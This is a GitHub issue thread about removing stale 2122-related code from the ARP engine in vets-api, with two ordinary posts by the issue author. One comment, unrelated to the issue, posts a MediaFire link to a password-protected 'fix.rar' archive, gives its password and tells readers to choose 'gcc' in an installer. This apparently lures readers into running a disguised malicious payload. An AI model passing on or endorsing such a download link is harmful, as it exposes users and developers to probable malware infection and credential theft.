### ISSUE TITLE
[Spindown] Clean up stale 2122 code from vets-api

### ISSUE THREAD

**Issue by gabezurita** [department-of-veterans-affairs/va.gov-team#91458]
Given [recent updates](https://app.zenhub.com/workspaces/accredited-representative-facing-team-65453a97a9cc36069a2ad1d6/issues/gh/department-of-veterans-affairs/va.gov-team/91458), various items in the ARP engine are now stale and need to be updated or deleted. These items should be addressed before the ARP project ends.

## AC
- [ ] The ARP engine has no dead code
- [ ] Tell Jen and Lesley this has been done

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by gabezurita** [comment]
This issue is somewhat related to [Update ARP engine to reflect the new 2122 data storage architecture#91193](https://app.zenhub.com/workspaces/accredited-representative-facing-team-65453a97a9cc36069a2ad1d6/issues/gh/department-of-veterans-affairs/va.gov-team/91193), but we cannot work said issue given the architecture has not yet been decided.
